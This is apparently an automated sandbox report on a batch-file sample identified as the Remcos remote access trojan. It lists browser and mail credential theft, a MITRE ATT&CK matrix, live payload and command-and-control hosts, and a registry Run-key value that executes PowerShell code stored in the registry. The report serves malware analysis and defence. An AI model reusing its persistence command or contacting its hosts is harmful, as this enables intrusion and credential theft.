                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_234B2264
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword14_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword14_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword14_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5704, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-G9FJB6Jump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		1
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		2
                Obfuscated Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter                		1
                Registry Run Keys / Startup Folder                		412
                Process Injection                		1
                Software Packing                		1
                Credentials in Registry                		3
                File and Directory Discovery                		SMB/Windows Admin Shares11
                Input Capture                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell                		Login Hook1
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		NTDS27
                System Information Discovery                		Distributed Component Object Model2
                Clipboard Data                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets41
                Security Software Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Modify Registry                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture213
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync4
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534998 Sample: MARSS-FILTRY_ZW015010024.bat Startdate: 16/10/2024 Architecture: WINDOWS Score: 100 42 iniiivan.duckdns.org 2->42 44 geoplugin.net 2->44 46 careerfinder.ro 2->46 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 72 8 other signatures 2->72 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 70 Uses dynamic DNS services 42->70 process4 signatures5 74 Early bird code injection technique detected 9->74 76 Writes to foreign memory regions 9->76 78 Found suspicious powershell code related to unpacking or dynamic code loading 9->78 80 Queues an APC in another process (thread injection) 9->80 14 msiexec.exe 5 17 9->14         started        19 conhost.exe 9->19         started        82 Suspicious powershell command line found 12->82 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 48 iniiivan.duckdns.org 94.198.96.165, 49887, 49894, 53848 ASSEFLOWAmsterdamInternetExchangeAMS-IXIT Italy 14->48 50 geoplugin.net 178.237.33.50, 49895, 80 ATOM86-ASATOM86NL Netherlands 14->50 40 C:\ProgramData\remcos\logs.dat, data 14->40 dropped 54 Detected Remcos RAT 14->54 56 Tries to steal Mail credentials (via file registry) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Installs a global keyboard hook 14->60 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 2 other processes 14->34 52 careerfinder.ro 185.248.196.6, 443, 49704, 49870 TES-ASRO Romania 21->52 62 Found suspicious powershell code related to unpacking or dynamic code loading 21->62 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 84 Tries to harvest and steal browser information (history, passwords, etc) 25->84 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MARSS-FILTRY_ZW015010024.bat11%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://www.imvu.comr0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                careerfinder.ro
                		185.248.196.6
                		truefalse
                  		unknown
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		unknown
                    iniiivan.duckdns.org
                    		94.198.96.165
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://careerfinder.ro/vn/Traurigheder.seafalse
                        		unknown
                        https://careerfinder.ro/rs/wQpkVl14.binfalse
                          		unknown
                          http://geoplugin.net/json.gpfalse
                          • URL Reputation: safe
                          		unknown
                          iniiivan.duckdns.orgtrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.imvu.comrmsiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://careerfinder.ro/msiexec.exe, 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://go.micropowershell.exe, 00000002.00000002.2148055608.0000024100C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://careerfinder.ropowershell.exe, 00000002.00000002.2148055608.0000024101D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.imvu.commsiexec.exe, msiexec.exe, 00000010.00000002.2598283322.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597717153.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597755288.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597734505.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/Iconpowershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.microsoft.powershell.exe, 00000002.00000002.2184487775.000002417A384000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.nirsoft.netmsiexec.exe, 0000000D.00000002.2626896117.0000000000C2F000.00000004.00000010.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://aefd.nelreports.net/api/report?cat=bingaotakbhv792D.tmp.13.drfalse
                                        		unknown
                                        https://careerfinder.ro/rs/wQpkVl14.binimsiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		unknown
                                              https://careerfinder.ro/vn/Traurigheder.seaXRpowershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.google.commsiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		unknown
                                                  https://aefd.nelreports.net/api/report?cat=bingaotbhv792D.tmp.13.drfalse
                                                    		unknown
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2362758455.00000000043D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://careerfinder.ro/vn/Traurigheder.seaPpowershell.exe, 00000002.00000002.2148055608.000002410022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://contoso.com/powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://aefd.nelreports.net/api/report?cat=bingrmsbhv792D.tmp.13.drfalse
                                                        		unknown
                                                        https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                          		unknown
                                                          https://login.yahoo.com/config/loginmsiexec.exefalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2148055608.0000024100001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.nirsoft.net/msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.imvu.comatamsiexec.exe, 00000010.00000002.2598283322.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597717153.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597755288.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597734505.0000000000B1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2148055608.0000024100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2362758455.00000000043D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://careerfinder.ropowershell.exe, 00000002.00000002.2148055608.000002410022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2148055608.0000024101614000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://www.ebuddy.commsiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                185.248.196.6
                                                                		careerfinder.roRomania
                                                                		50937TES-ASROfalse
                                                                94.198.96.165
                                                                		iniiivan.duckdns.orgItaly
                                                                		49367ASSEFLOWAmsterdamInternetExchangeAMS-IXITtrue
                                                                178.237.33.50
                                                                		geoplugin.netNetherlands
                                                                		8455ATOM86-ASATOM86NLfalse

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1534998
                                                                Start date and time:2024-10-16 13:06:33 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 35s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:17
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:MARSS-FILTRY_ZW015010024.bat
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winBAT@22/13@3/3
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 96%
                                                                • Number of executed functions: 146
                                                                • Number of non-executed functions: 316
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .bat

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 3664 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 6504 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: MARSS-FILTRY_ZW015010024.bat

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                07:07:24API Interceptor83x Sleep call for process: powershell.exe modified
                                                                07:08:47API Interceptor308635x Sleep call for process: msiexec.exe modified
                                                                13:08:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run humplers %Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)
                                                                13:08:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run humplers %Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                185.248.196.6Bestellerinnerung - Rechnungsnummer 2024-507315.wsfGet hashmaliciousGuLoaderBrowse
                                                                • careerfinder.ro/Inconcurrent.cur
                                                                178.237.33.50SecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • geoplugin.net/json.gp
                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp
                                                                rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • geoplugin.net/json.gp
                                                                remcos.exeGet hashmaliciousRemcosBrowse
                                                                • geoplugin.net/json.gp

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                careerfinder.rorComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 185.248.196.6
                                                                Bestellerinnerung - Rechnungsnummer 2024-507315.wsfGet hashmaliciousGuLoaderBrowse
                                                                • 185.248.196.6
                                                                geoplugin.netSecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
